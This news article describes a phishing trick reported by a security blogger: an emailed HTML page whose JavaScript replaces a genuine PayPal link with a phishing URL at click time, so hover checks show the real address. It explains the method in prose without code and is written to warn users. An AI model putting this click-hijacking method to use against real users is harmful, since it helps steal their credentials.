If cyber criminals get smart about their mode of operation, hovering links to check their actual location may soon turn out be a useless security tip
Normally, phishing emails contain links which redirect users to Web pages created to look like the real service they’re imitating.
PC users have always been instructed to hover links in the emails they receive or the buttons on a suspicious page to detect if any of the links lead them back to a trusted domain, or just a look-alike URL.
Recently, a security expert known as @dvk01uk, owner of the “My Online Security” blog, has found a brand new phishing trick.
The expert claims that he spotted a phishing email which contained an HTML page attachment. After openning the page in his browser, the website loaded using a local client-side URL, however, there was another interesting thing that attracted his attention.
Hovering the “Submit” button showed an authentic PayPal URL, which made no sense. Why would a phisher go through all this effort to deliver a non-functional page that delivered phished credentials to the real PayPal website?
The expert found his answer in the JavaScript files loaded by this phishing email, which contained code that hijacked user clicks. Apparently, the malicious JS code was set to replace any requests to paypal.com wth with the malicious phishing URL, right after the user clicked the link. Hovering the URL would not do anything, and the browser showed the correct PayPal link.
The only mistake of the hacker was to provide this HTML file as a downloadable page. This is something that should ring thousands of alarm bells with any user, since Web services never provide you a copy of their Web pages, but ask you to visit their websites.
According to My Online Security, “Now if the phishers were intelligent enough to put this on a website with a half believable URL, something like http://paypalnew.com which was used in a series of Phishing attacks yesterday, we would be in trouble, because users wouldn’t realize that they were giving their details to a phisher.”
The problem is that if you can’t read JavaScript code, it will be very difficult for you to recognize this phishing trick if it ever gets implemented by a smarter hacker.
